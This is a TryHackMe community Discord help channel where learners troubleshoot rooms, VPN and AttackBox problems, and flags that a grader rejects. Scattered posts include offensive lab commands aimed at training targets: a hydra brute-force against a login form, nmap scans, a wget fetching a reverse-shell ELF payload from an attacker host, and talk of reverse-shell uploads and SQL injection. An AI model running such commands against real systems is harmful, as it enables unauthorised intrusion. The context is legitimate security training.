#room-help

1 messages · Page 4 of 1

bronze etherBOT
#

@brave cypress Please slow down. Further spam will result in a short timeout.

weak agate
#

how to solve them?

drifting escarp
ashen crane
desert dragon
#

I feel a little bit bad, also asking for help with the same room, but I am trying to triage alerts in the SOC L1 Alert Triage room. I got the first one, but I have tried all of the other options on the multiple choice, and tried refreshing it a couple of times, and I still am having issues triaging the second one.

#

nvm, I was able to figure it out.

dapper lake
#

Hey guys a unkown number is calling can i find whos is it behind this number?

little jetty
dapper lake
#

I am on ios

little jetty
dapper lake
#

Its okey i have an androit too but i dont use it that much i will give it a try thank you btw

jade warren
#

What about Discord Tocken?

main eagle
#

Hi everyone, im currently in "Incident handling with splunk" and the room make me very confusing. At task 4, reconnaissance phase, instruction said "validate ip scanning" but the matter of fact here is in the splunk lab it only show a huge http request to 1 url only which i think a little bit conflict with "scanning" definition (multi request to multi url/port). I think this should be a brute force attempt or ddos, what do you think ?

slim bison
#

you get this resolved (pun intended)? Remember, it's always dns. You likely need to edit your /etc/resolv.conf - tested and working as expected from my own kali over openvpn

tardy rock
#

boop

buoyant plank
#

I am taking some Burpsuite Labs and the target machine is not available. Has anyone else ran into this issue?

slim bison
dull apexBOT
ebon glade
#

hi guys , anyone can help me with BreachingAd room , im running through an issue try to do Pass-back attack for ldap , im trying to post a photo but it wont let me , so i will explain it here in wrting , when im visiting http://printer.za.tryhackme.com/settings to test me nc listiner on 389 , anyway i put my ip and i press test settings button i always get "LDAP Connection failed: The LDAP server is unavailable." tried many times same error , made sure im connected on the same network

ebon glade
#

ok nevermind its sorted with good gemini 😄 lol , thanks everyone

vagrant fern
vivid thicket
#

bonjour j'arrive pas a écrire sécurité défensive

little jetty
slate gull
slate gull
#

its look likes it work. but i don't know why it didn't work the first time

slender girder
#

🇬🇧 English:
Hello everyone,
My name is [mehdi], I’m 17 years old from Morocco. I’m a complete beginner in ethical hacking and cybersecurity, and I’m really motivated to learn and improve myself step by step.

Right now, I only use my phone, but I’m trying to make the best out of what I have while learning the basics. I’m looking for guidance, resources, and people who can help me grow in this field and become a skilled and responsible ethical hacker.

I believe in learning legally and using knowledge to protect systems, not harm them. If anyone has advice, learning paths, or is willing to mentor or guide me, I would really appreciate it.

Thank you for your time 🙏


🇲🇦 العربية:
السلام عليكم،
أنا اسمي [اسمك]، عمري 17 سنة من المغرب. أنا مبتدئ تماماً في مجال الهكر الأخلاقي والأمن السيبراني، وعندي رغبة كبيرة باش نتعلم ونتطور خطوة بخطوة.

حالياً كنستعمل غير الهاتف ديالي، ولكن كنحاول نستغل الإمكانيات اللي عندي باش نبدا بالأساسيات. كنقلب على ناس يعاونوني بالنصائح، مصادر التعلم، أو التوجيه باش نقدر نطور راسي ونولي هاكر أخلاقي قوي ومسؤول.

أنا كنآمن بالتعلم القانوني واستعمال المهارات لحماية الأنظمة، ماشي للإضرار بها. أي نصيحة أو مساعدة غادي تكون محل تقدير كبير.

شكراً بزاف 🙏

slender girder
rotund hollyBOT
#

Gave +1 Rep to @little jetty (current: #1266 - 5)

slim bison
slate gull
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #271 - 40)

dusty geyser
#

Hi

#

Hi everyone! I'm stuck on a "Topic Transition Recap" task in the Windows and Active Directory room.

Task question: "What PowerShell command would reset the password for user 'alice' in Active Directory and prompt for the new password securely?"

I've tried:

Set-ADAccountPassword -Identity alice -Reset -NewPassword (Read-Host -AsSecureString -Prompt "New password")

But I keep getting: Set-ADAccountPassword: invalid arguments

I've checked for typos, kept it on one line, and included -Reset. Nothing works. Could someone please point out what I'm missing? Thank you!

jade warren
weak agate
ashen crane
slim bison
weak agate
ashen crane
weak agate
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #267 - 41)

dusty geyser
#

@slim bison thanks

ashen crane
weak agate
ashen crane
ashen crane
weak agate
ashen crane
#

You triage alerts based on the context and not just because it's marked as critical or high

ashen crane
weak agate
ashen crane
weak agate
weak agate
weak agate
ashen crane
weak agate
weak agate
ashen crane
weak agate
ashen crane
# weak agate false positive

Congrats - you're right

It's a correct Zoom domain, so it will definitely send out voice and maybe video - those are pretty big when it comes to size
When you look at the network name (UK04/MEETINGROOM) it gets a bit clearer. There must've been a bit of meetings in that room today and for sure not everyone was there in person, so they used zoom to connect and probably used a camera

So we get back to the beginning. Voice and Video are pretty big.

When we connect alert + context you get an actually true view and result

weak agate
rotund hollyBOT
#

Gave +1 Rep to @ashen crane (current: #44 - 268)

weak agate
slim bison
ancient field
#

Good day everyone. Emeka here, from Nigeria. recently picked interest in cybersecurity and i guess curiosity led me here. hope to learn a considerable lot from all of you here. Gracias.

weak agate
ashen crane
ashen crane
weak agate
ashen crane
slim bison
# weak agate is it true positive?

look at the chain of commands and their order in Invoked Commands - does this look like usual activity for a normal user on the network or an attacker?

weak agate
# ashen crane All right, I'll ask a different question - how did you come up with the idea tha...

I marked it as a likely true positive mainly because it looks similar to known attack behavior, but I’m not 100% certain without more context. The IIS process spawning a reverse shell and then running AD discovery commands is something we often see after a compromise, especially on a DMZ Exchange server under SYSTEM. That said, I still feel it should be validated against any approved admin scripts or monitoring tools before making a final call.

ashen crane
#

So, weird path + what you've said = true positive

weak agate
ashen crane
ashen crane
little creek
#

It worked! Configured "Last 5 years", should work. Tnx!

primal pollen
#

what i need to put here? im a little confuse i know what it is but.. they need the "exacly" right answer

woeful marsh
#

hi everyone what did you gus write for this question {What category of ARP Packet asks a device whether or not it has a specific IP address?}

dapper helm
#

Doing room Subdomain Enumeration... im supposed to go to crt.sh but it's giving me 502

orchid rover
sacred moat
#

Hi guys I need help on windows powershell room, whenever I try to connect the attackbox using remmina there is an error "could not start SSH session"

slim bison
sacred moat
#

I followed the steps provided on how to connect to the lab including the target IP

sacred moat
#

yesterday it was working, today it won't connect on the remmina

slim bison
slim bison
sacred moat
#

I'm from Asia so I use the AP region mumbai

slim bison
sacred moat
#

Already tried terminating and opening atk box twice still the same issue

#

Ohh I see thanks, I'll try and test it again

slim bison
main eagle
#

hi, is there any problem with mumbai server? i cant start machine in room, have been waiting for 1 hour with "no available machine right now"

wise dune
#

Hi, i am in subdomain enumeration but can not access https://crt.sh its say 502 Bad Gateway

orchid rover
#

does it still say down? @wise dune

wise dune
rotund hollyBOT
#

Gave +1 Rep to @orchid rover (current: #996 - 7)

ocean tendon
#

I am in the room https://tryhackme.com/room/aimodelsdata
and at the challenge section i got an issue on the Files tab i can't select the enterprise-classifier-v2.pkl text, it is not clickable i found all the other words on the model card tab.
What I am doing wrong?

TryHackMe

Explore how data is fundamental to AI security, and the models which power it.

graceful flicker
#

Hi,
I'm having technical difficulties in the room ExploitingAD. I'm stuck before it gets interesting. I followed all instructions and I ssh za.tryhackme.loc\louis.thornton@thmwrk1.za.tryhackme.loc is still getting stuck. BTW I'm running the original AttackBox (AttackBox Beta was worse over the last days, so I came back to the original one) Any ideas what might be the problem?

weak agate
# ashen crane Is it still the same room?

no its the SOC L1 alert reporting room and still i did not received any flag for these 2 ques. For the first ques they said i need to fill the flag from my previous task alert triage and i did the same but it is not accepting that flag

ashen crane
weak agate
weak agate
ashen crane
weak agate
ashen crane
weak agate
ashen crane
# weak agate yes

So read it and check whether you've actually did what the task asks you for

weak agate
weak agate
weak agate
weak agate
ashen crane
weak agate
ashen crane
weak agate
ashen crane
weak agate
ashen crane
weak agate
ashen crane
weak agate
ashen crane
weak agate
ashen crane
slim bison
lusty wagon
#

HEY

ocean tendon
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #263 - 42)

slim bison
true plank
#

Hello, I am working in SQL Injection Lab.
For task4 I succed to authenticate, but I dont see the flag.

#

Do I need to authenticate as an particular user?

analog heath
weak agate
analog heath
true plank
#

really weird

#

I dont understand why is not working

ashen crane
slim bison
true plank
#

make me confuse more that teach me that challenge

slim bison
# true plank that works

good- now the homework for you is to look at how the form is parsing it versus your non working payload to see why it worked and yours didnt - you can see it in view-source or burp

weak agate
orchid rover
weak agate
orchid rover
analog heath
# weak agate still not correct

type manully instead. or just type 00000000000 and send it to see underscores and your flag pattern whether its correct or something else.

orchid rover
#

Its gotta be a different phrase

ashen crane
wooden hedge
#

I am a fullstack engineer who has almost 6 years.
But I really wanna cyber security engineering from now.
Plz help me.

past kindle
#

Where can I get answers to the Alert Prioritisation

#

I am stuck

graceful flicker
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #258 - 43)

weak agate
weak agate
analog heath
wind blade
#

I’m doing the Hoppers Origins, and the VPN access has stopped working. Is anyone else having the same issue? It seems like the lab is stuck.

round pivot
#

HII

hallow relic
#

I am having trouble with a question from Task 6 of the Splunkk 2 room. here is the particular question I am having an issue with :

"What unusual file (for an American company) does winsys32.dll cause to be downloaded into the Frothly environment?"

https://tryhackme.com/room/splunk2gcd5

TryHackMe

Part of the Blue Primer series. This room is based on version 2 of the Boss of the SOC (BOTS) competition by Splunk.

hallow relic
#

Not letting me copy the text in the submmission box of the tryhackme room

#

Thiis is the answer, but something is wrong with the submission to this particular question.

slate gull
final tide
#

Hello

quick idol
#

I'm writing PT1 exam, flag is not showing. But it is the valid one

idle quest
#

Hello

weak agate
hallow relic
slate gull
hallow relic
molten socket
#

help me cli command saying no directory found

slate gull
hallow relic
slate gull
#

it should looks like this "I love David.hwp"

#

filename can have space

hallow relic
#

i did that and it wouldnt accept my answer
. did it accept yours

slate gull
#

and i can't seem to find it as well

hallow relic
#

its the splunk 2 room

slim bison
slate gull
hallow relic
#

ok

slim bison
hallow relic
slim bison
# hallow relic i tried submitting the korean solution ...and it would not allow me

I would not overthink this one. The string is Unicode-escaped Hangul Jamo. Decode it with CyberChef using “From Unicode Escape.” On my host machine, Chrome preserves the original characters.

The technically correct decoded filename is:
나는_데이비드를_사랑한다.hwp

나는_데이비드를_사랑한다.hwp <--- even Discord corrupts the data upon display

If the grader rejects it, try the same answers without .hwp. Some graders want only the filename stem.

If it accepts something that looks truncated or oddly split, that is probably a Unicode normalization/display issue with the grader rather than your decoding being wrong.

sinful knoll
#

Hello , i m doing Nmap Advanced Port Scans and i was wondering why i can t use my kali linux with vpn doing these rooms only able to reach the target machine with nmap on the attackbox , did someone encounter this as well ?

slim bison
sinful knoll
#

eu central -1

#

but i m using kali linux on wsl

slim bison
sinful knoll
#

i can ping it

#

└─$ ping 10.112.158.59
PING 10.112.158.59 (10.112.158.59) 56(84) bytes of data.
64 bytes from 10.112.158.59: icmp_seq=1 ttl=62 time=27.2 ms
64 bytes from 10.112.158.59: icmp_seq=2 ttl=62 time=30.1 ms
64 bytes from 10.112.158.59: icmp_seq=3 ttl=62 time=27.5 ms
64 bytes from 10.112.158.59: icmp_seq=5 ttl=62 time=27.5 ms
64 bytes from 10.112.158.59: icmp_seq=6 ttl=62 time=27.1 ms
^C
--- 10.112.158.59 ping statistics ---
6 packets transmitted, 5 received, 16.6667% packet loss, time 5024ms
rtt min/avg/max/mdev = 27.082/27.878/30.092/1.120 ms

┌──(szabi㉿Szabi-PC)-[/mnt/c/Users/szabi]
└─$ nmap -sn 10.112.158.59
Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-09 18:59 +0300
Nmap scan report for 10.112.158.59
Host is up (0.028s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

#

but nmap is giving no result while on attackbox
┌──(root㉿kali)-[~]
└─# nmap -sF 10.112.158.59
Starting Nmap 7.93 ( https://nmap.org ) at 2026-05-09 15:51 UTC
Nmap scan report for ip-10-112-158-59.eu-central-1.compute.internal (10.112.158.59)
Host is up (0.0023s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
993/tcp open|filtered imaps
995/tcp open|filtered pop3s

Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds

┌──(root㉿kali)-[~]
└─# nmap -sN 10.112.158.59
Starting Nmap 7.93 ( https://nmap.org ) at 2026-05-09 15:52 UTC
Nmap scan report for ip-10-112-158-59.eu-central-1.compute.internal (10.112.158.59)
Host is up (0.0044s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
993/tcp open|filtered imaps
995/tcp open|filtered pop3s

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds

┌──(root㉿kali)-[~]

calm cliff
#

for my secure my acount

sinful knoll
#

FYI i was able to reach it and you need to run the vpn trough kali linux

slim bison
slim bison
shell cape
#

hello in burp suite I cannot see the advisory tab anymore. Can anyone help me where this is located?

slate gull
shell cape
rotund hollyBOT
#

Gave +1 Rep to @slate gull (current: #997 - 7)

slate gull
#

you shouldn't take too long to do it.

#

good luck

shell cape
#

alright man thanks!!!

primal pollen
#

im with this flag THM{NmNlZTliNGE1MWU1ZTQzMzgzNmFiNWVk} but i already decode in base64 and dont get the right answer.. i have try with NT or md5 but nothing.. anyone could give me a hint

slim bison
unborn grail
#

hello anyone know a list of ctf rooms after finishing the 101 cybersecurity ?

little jetty
remote silo
#

Hey guys, how are you? I hope you're doing well. This is my first time here on Discord with this community, and I'm still learning the ropes. I have a question—is there a channel where I can ask for help?

slim bison
lyric light
#

Hi, I have a question. What is the best way to learn binary exploitation. Recently I got a lil bit comfortable with reverse engineering and solving some easy crackmes here and there. I've been trying to find a room in THM or any other resources to learn some binary exploitation and exploit development but I kinda feel paralysed by soo many resources available. What should I do? Which resource should I focus on ?

vagrant fern
#

Hey, this is an English only server. Thanks!

rotund hollyBOT
#

Gave +1 Rep to @fleet flint (current: #3761 - 1)

orchid rover
rotund hollyBOT
#

Gave +1 Rep to @vagrant fern (current: #11 - 946)

idle kelp
#

Hi everyone,
Can some one help me with the screenshot please?
I’ve tried a few combinations then asked the bot,
The bot’s telling me it can be a format issue but I copy paste what he sent me, any ideas?

#

Well it looks like I can’t send a screenshot 😅

rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #254 - 44)

idle kelp
slim bison
idle kelp
#

It was 51 🤦

#

I was sure it was a format issue because of the bot

idle kelp
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #249 - 45)

slim shadow
#

Hey can someone help me? I need help unblurring these images or image cus it's the same image but the username is blurred in it and idk how to unblur it

tardy canyon
#

I'm having trouble with question 4 in the room Splunk 2 Series 400. I found the answer, but it's not being accepted. I checked on Google first, and the answer I found is correct.

slim bison
tardy canyon
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #247 - 46)

slim bison
tardy canyon
slim bison
#

verify your account

tardy canyon
slim bison
# tardy canyon

that looks correct- have you tried without the file xsion?

tardy canyon
slim bison
# tardy canyon

this is what the grader shows accepted for me, although the grader sometimes alters the final result

tardy canyon
slim bison
tardy canyon
#

thank you for your help

slim shadow
slim shadow
analog heath
slim shadow
#

Oh I thought I did tho

slim bison
woven tapir
#

Hi everyone, I have a general question based on a curiosity. How did we know that the packet with attachment "attachement.scr" is malicious? (Phishing prevention room, task 7, question 4)

slim bison
# tardy canyon I see. I followed the steps using CyberChef and got the same result as you. It's...

Found a solution. Room is bugged 7 ways from Sunday on this one, but where there's a will... basically the browser was the problem so I went direct with curl.

Why copy-paste fails:

The question answer contains a Korean filename. The grader stores it in Unicode NFD (Normalization Form Decomposed - raw
Hangul Jamo consonants and vowels). The browser UI normalizes all user input to NFC (Normalization Form Composed - precomposed
syllable blocks) before sending it to the api. NFC and NFD are semantically identical but have different byte representations,
causing the grader to always reject the correct answer when submitted through the browser.

reef plaza
#

I cannot get past the DAST room Task 3. Every time I press start scan to launch the AJAX Spider, it says Firefox is not supported.

slim bison
reef plaza
slim bison
slim bison
#
# Install OWASP ZAP with Snap
snap install zaproxy --classic

# Launch ZAP once
zaproxy

# ZAP may download the latest Linux tarball here:
# /root/.ZAP/plugin/ZAP_2.17.0_Linux.tar.gz

# Create install directory
mkdir -p /opt/zap-2.17.0

# Extract latest ZAP into /opt
tar -xzf /root/.ZAP/plugin/ZAP_2.17.0_Linux.tar.gz -C /opt/zap-2.17.0 --strip-components=1

# Install Java 17 JRE
apt update
apt install -y openjdk-17-jre

# Launch latest ZAP
cd /opt/zap-2.17.0
./zap.sh
``` @reef plaza this is one way to move forward
heady obsidian
#

Hi guys, I am currently doing the https://tryhackme.com/room/windowseventlogs room and I am stuck on task 2 on the question "Filter on Event ID 4104. What was the 2nd command executed in the PowerShell session?". On the right pane, I used the action: "Filter Current Log..." and filtered for the event id 4104 and then I sorted the results by "Date and Time" descending but the 2nd (see the image) isn't the right answer.

TryHackMe

Introduction to Windows Event Logs and the tools to query them.

#

And also when I am trying to answer the "Analyze the Windows PowerShell log. What is the Task Category for Event ID 800?" question, so I filter for the event id 800 but no results. Why?

#

Anyone a idea? For me it looks like the room isn't matching the the questions & answers.

heady obsidian
#

Next thing, on task 3 the answer to the question "How many log names are in the machine?" isn't correct. In ran the following command: wevtutil.exe el | Measure-Object the output of the command is:

PS C:\Users\Administrator> wevtutil.exe el | Measure-Object


Count    : 1072
Average  :
Sum      :
Maximum  :
Minimum  :
Property :

But the right answer is 1071. Wtf?!

tardy canyon
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #239 - 48)

elder flicker
#

The file inclusion the last question. Why does mine only have the following string without the previous name?

lyric forge
#

i need help with the metasploite exploitation room? specifically task #6. I created the .elf payload, then started the server with python3 -m http.server 9000 then in another shell I ran wget http://attacking_machine_ip:9000/shell.elf and i get this : wget http://10.67.78.234:9000/rev_shell.elf
--2026-05-11 14:13:17-- http://10.67.78.234:9000/rev_shell.elf
Connecting to 10.67.78.234:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: \u2018rev_shell.elf.1\u2019

rev_shell.elf.1 100%[===================>] 207 --.-KB/s in 0s

2026-05-11 14:13:17 (19.4 MB/s) - \u2018rev_shell.elf.1\u2019 saved [207/207]

#

where is open ticket button?

#

thank you ❤️

#

so the link you sent was a scammer trying to connect me to a Defi wallet LOL

#

need help please :/ Metasploite exploitation task #6. I am unable to set up the handler

deft carbon
#

Hey guys I’m in network core protocols trying to make ssh connection but it’s not working, I tried the target IP address and tryhackme password but access denied , what should I do?

deft carbon
lyric forge
#

Where can we get help on a room? I’m stuck and the AI bot is never working. The instructions are ambiguous :/

deft carbon
#

you just have to write your problem here @lyric forge im trying to get help too

slim bison
deft carbon
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #235 - 49)

slim bison
sterile hawk
#

Skipping some rooms in learning path will get certificate
I mean in every learning path showing some rooms pay premium and some rooms are free how will I get certificate ?

restive sky
#

https://tryhackme.com/room/dailybugle
help with this room please. Stuck on "What is the user flag?" question. I uploaded a reverse shell, but it's not executing it once i try to access it as a .phar file.

TryHackMe

Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

rotund hollyBOT
#

Gave +1 Rep to @deft carbon (current: #3763 - 1)

lyric forge
# fathom rover Got a helping hand?

Not yet thank you 🙏🏻 I am stuck in the metasploite exploitation room. Task #6 doesn’t really explain how and where to set up the handler. I create the .elf payload in one console and then start the http.server 9000 in the same console. Then in a different console I connect the target machine to the server with wget… after this I’m unsure where to start the handler? I tried in a third console but I get an LHOST error. I had set the LHOST to the attacking machine’s IP and the port the same as I set in the payload. The instructions didn’t really clarify how to set up the handler and then how to use it to capture the hash to answer the questions below this, so I’m a little lost. Thank you for your time!!

rotund hollyBOT
#

Gave +1 Rep to @fathom rover (current: #3763 - 1)

twin yew
#

Hello

fallow geyser
#

Where do we start with all of this fun stuff? I did a few thingies on the website but how do I personally upgrade my skill as an absolute beginner in this place and cyber security as well?

orchid rover
#

Start on the presecurity path and then work from there

eager orchid
#

Hello, in Task 7 IDOR, the virtual machine won't open even though the IP address is there , and I don't see the tab to open the “attackbox” virtual machine. If anyone can help me, I'd really appreciate it!

slim bison
eager orchid
slim bison
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #222 - 50)

patent plume
#

Hello I'm new , I would like to ask so guidance what's cooking currently inthis place.

broken pine
#

hi

gusty sinew
#

Hello i am trying to login to an remote desktop for a assignment in Active Directory Basics room but it is not letting me this screen pops up and says enter password but i want it to open the actual remote desktop and enter the password there, does anyone has a solution for that, Thanks.

open surge
#

hello

#

can anyone complete the hydra room?

#

i have tried everything

#

including copying working solutions

slim bison
open surge
#

task 2

#

question 1

slim bison
# open surge question 1

got it- what is the issue you are facing- let's see your command syntax- what output you getting?

open surge
#

the output is that it keeps running and passes 32 attemps

#

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.140.141.208 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect"

#

and

#

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.140.141.208 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

#

and

slim bison
#

use backticks for syntax for readability like this hydra

open surge
#

alright

#

it looks like it was a bug

#

i restarted the server and the old command worked

#

sorry for wasting your time

slim bison
#

fyi, most of these labs that teach syntax provide examples that are slightly "off" from what is actually needed to solve by design - the author wants the learner to take the lesson and then extrapolate for a new case to prove you know the tool

slim bison
# open surge sorry for wasting your time

ah that makes sense, all the brute-forcing likely "tipped over" the target, so restart was a good move - and yes since incorrect is part of the Response message, it will match on failed logins;)

umbral glen
rotund hollyBOT
#

Gave +1 Rep to @umbral glen (current: #1845 - 3)

fierce arrow
#

Good day good people how does one get VM running without paying the full $90 I'm new and still learning.

slim bison
# fierce arrow Good day good people how does one get VM running without paying the full $90 I'm...

You do not need to pay $90 just to start learning on TryHackMe.

A free THM account gives you access to many free rooms, and the AttackBox is available on the free plan, but it is time-limited to about 1 hour per day.

If you want more lab time without paying for unlimited AttackBox, the normal free option is to run your own Kali VM locally with VirtualBox or VMware, then connect to TryHackMe using your OpenVPN config from the THM Access page.

So the question is: are you asking about the TryHackMe AttackBox limit, or how to set up your own Kali VM?

nocturne hornet
#

helloo

half mountain
#

need help in the basic malware re room. First, there has to be a better way to download the task files. I opened the attackbox and went to the browser to do it and downloaded the file. BUT it always messes up my screen when I do it that way. Anyhow, I got it downloaded but now it doesn't unzip. I have tried the unzip method and it says it's an archived file and I need a password. So I need some help please.

half mountain
#

Here's what it gives me when I try to download them

primal pollen
#

parameters its like
Zip2john [zip file] output.txt

half mountain
#

I am not sure if I am supposed to need a password. All the links I looked up on youtube they had already had it downloaded but I can try that

primal pollen
#

Could u share the room?

half mountain
#

basdi malware re

#

basic malware re

#

this is what one writemeup in youtube has

primal pollen
#

the hint

half mountain
#

I took that to a crack the hash, (the green stuff I had) but still didn't get an answer

#

let me try again with just the numbers

#

I didn't get an md5 hash

primal pollen
#

im trying too

half mountain
#

The hint doesn't show up for me

late shale
#

Hi im doing the Kenobi Room and it seems I am getting wildly different results than whay the room is expecting. 8 open ports when there are supposed to be 7, only 1 smb share when there are supposed to be 3..... not sure what im doing wrong

primal pollen
half mountain
#

Did you find that in the blog?

#

Nevermind, lol. I see where the password is.

primal pollen
#

so after u use the strings command to check the .exe

half mountain
#

Lol, ya, I saw it after I read the WHOLE page

#

it helps if I read the entire page

#

how would I do it command line

primal pollen
half mountain
#

this is all new to me, lol

#

I looked at all the files and couldn't find a hash

#

most of them are empty. I know we have to unzip the file in order to read it

primal pollen
#

u use
strings file.exe

#

and them u can take a look

#

its a lot of flags and u can try filter

#

strings file.exe | grep flag
etc...

half mountain
#

I don't have the executable file showing yet on command line

primal pollen
#

so the file is strings1.exe_

#

to read this.. u use the STRINGS command

#

or u can put all the content in a txt like strings strings1.exe > strings1.txt

half mountain
#

I don't see the executable anywhere

#

I have the zip files and when I used the password, this is what showed up

#

when i click on the zip file on the right, the left window is what showed up (strings1.exe)

#

when I clicked on that and put in teh password, this is what came up

#

but I can't seem to get it on command line

primal pollen
#

for u dont wast time with this

half mountain
#

it did it there

#

I clicked on it and it goes back to this

#

now I see it on cli

primal pollen
opaque cedar
#

hi, currently going through the windows fundamentals 1 room https://tryhackme.com/room/windowsfundamentals1xbx and the tasks seem to be a bit out of order, i think task 3 is meant to be task 1. not a critical mistake or anything but a bit confusing nonetheless

primal pollen
half mountain
#

Keep it up!

primal pollen
half mountain
#

Lol, I've never even heard of radare2!

#

Something new to look up🤣 🤣 🤣

wise dune
#

hi guys, at Windows Event Logs room, Microsoft > Windows > PowerShell > Operational , i can not find ID 800. Lowest ID is 4100

#

i use Remina on attackbox

gentle phoenix
cobalt orchid
#

@gentle phoenix try this youtube vid "The Pyramid of Pain Explained"; all answers are there

wise dune
#

No Event were found!

foggy marsh
#

Just a quick question, in the Moniker Link (CVE-2024-21413) room.
How much trouble, will i get in for cracking the netNTLMv2 hash for the funnies?

Im aware this is entirely outside of the scope of the room, which's why im asking

TryHackMe

Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View.

ripe helm
#

Hey, need help the the room owasp top 10 2025 : insecure data handling in task 3
A05:injection

woeful bluff
#

hey everyone, quick (probably stupid) question. I'm still a beginner, exploring. I have a MacBook. I know how to type the ~ (tilde) in other applications, but in the VM (Linux) in the exercises, the terminal won't let me type it? I'm currently in Linux CLI Basics (pre-sec path).

rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #217 - 51)

foggy marsh
unreal dirge
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #211 - 52)

deft carbon
#

im stuck on this qn; what login and password should i use to authenticate user in this IMAP,

slim bison
slim bison
ivory inlet
#

Hello,

Does anybody knows how to hack?

I need to catch a scammer who is trying to scam me

I am new to cybersecurity

orchid rover
# ivory inlet Hello, Does anybody knows how to hack? I need to catch a scammer who is trying...

We will not help with the following but not limited to:

  • Account hacks/penetration testing
  • Blackmailing
  • Asking about account restoration
  • Game hacks or cheats
  • Revenge hacking
  • Cyberstalking
  • Take down services aka d/ddos attacks
  • Etc

We will not risk our own lives to help a stranger get their accounts back or perform tests by using illegal or unethical means. If support or someone is asking you to do this. Please refer them to the rules of this server and or the proper support pages for better help.

ivory inlet
#

Sure

Thank you

mild ferry
#

idk where to start

orchid rover
nocturne karma
#

I also tried creating a reverse shell from /tmp/test.py, but that script never seemed to execute either.

slim bison
woeful bluff
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #204 - 54)

slim bison
# woeful bluff Thanks for the reply!! It still doesn't work unfortunatly. I also believe it is ...

Yep, that makes sense. The “Set Character Encoding” menu is not the right setting. Encoding controls how text is displayed, not how your keyboard keys are mapped.

This sounds like the Linux VM / AttackBox is using a US keyboard layout while your physical keyboard is Belgian AZERTY.

Try this inside the Linux terminal:

setxkbmap be

Then test the tilde again.

You can check the current layout with:

setxkbmap -query

If be does not feel right, you can list Belgian variants with:

localectl list-x11-keymap-variants be

If this is the THM browser AttackBox, also check the AttackBox side toolbar/settings for keyboard layout. Sometimes the browser VM has its own keyboard mapping separate from the Linux desktop settings.

Also, don’t use Terminal → Set Character Encoding for this. You want Keyboard Layout / Input Source, not character encoding.

turbid lake
#

hello good morning everyone
Could you help me with something? in the Moniker Link room (CVE-2024-21413) Task 3, I have already made the change to line 12 and line 31 correctly, the email is sent but nothing arrives in the outlook of the victim machine
To make sure I didn't do something wrong:
On line 12 I put 'victim@(ip attacker).thm'
and on line 31 server = smtplib.SMTP('victim ip', 25)
As I said, the email is sent after running the exploit but I end up not receiving anything

#

Honestly, I'm 1 hour into this and I've already tried several modifications, even changing the machine/IP
as a first choice I preferred to come and ask here rather than google search

turbid lake
#

I came back a few hours later and managed to find the problem thanks to @heady fractal in #room-bugs on 01/02/2025 thanks hero

rotund hollyBOT
#

Gave +1 Rep to @heady fractal (current: #89 - 126)

crimson ingot
#

Ho bisogno per cortesia, se qualcuno mi può dare queste tre risposte, perché io uso il telefonino e non il pc se qualcuno è disponibile a darmi tre risposte, vi ringrazio moltissimo questi sono le tre risposte Qual è la prima bandiera?

Controllo
Qual è la seconda bandiera?

Controllo
Qual è la terza bandiera?

Controllo

crimson ingot
#

need help, please. If someone can give me these three answers, I would really appreciate it because I’m using my phone and not a PC. If anyone is available to help me with the three answers, thank you very much. These are the three questions: What is the first flag? Check. What is the second flag? Check. What is the third flag? Check.

orchid rover
#

Well what room is it?

crimson ingot
#

Cypheron
A collection of insane difficulty challenges available as part of our public 2026: An AI Odyssey CTF event.

#

Yes, this is the roo

orchid rover
#

Wait did you just jump into an ctf event, do you have any cyber security background or foundation?

crimson ingot
#

have some experience, I’m in the Gold Shield, but I’m using my phone. In that room it asks me to start the machine, but the machine can only be started with a PC, and I’m using a phone. I can’t start it.

orchid rover
crimson ingot
#

Because I don’t have one.

orchid rover
#

Well thats going to be a bit of a tough time then

slim bison
crimson ingot
#

I’m not cheating. I’m honestly using only my phone, and that’s making things difficult. If it looks suspicious, I understand, but that’s not my intention at all. Thanks anyway.

#

Thank you for your trust.

slim bison
tight sun
#

is anyone having an issue opening AI ctfs through the attack machine? i cant view it from firefox of the attackbox even when i leave the AI to boot up for 10 minutes (last CTF of the vetera easy difficulty)

crimson ingot
#

No, thank you. I don’t want to take anything from anyone. Anyway, thank you for your effort.”

tight sun
#

just figured it out, had to specify the port number on the browser

#

Thank you anyway 🙂

orchid rover
#

No problem

woeful bluff
slim bison
# woeful bluff I gave these commands, it reset the keyboard layout to BE, but still it doesn't ...

That sounds extra frustrating.

If setxkbmap be reset the Linux keyboard layout and the problem still affects characters like: ~ ^ ù ` é § ç à

then it may not be the Linux layout anymore. It may be the browser-based VM input layer not passing Belgian AZERTY / dead-key characters correctly into the AttackBox.

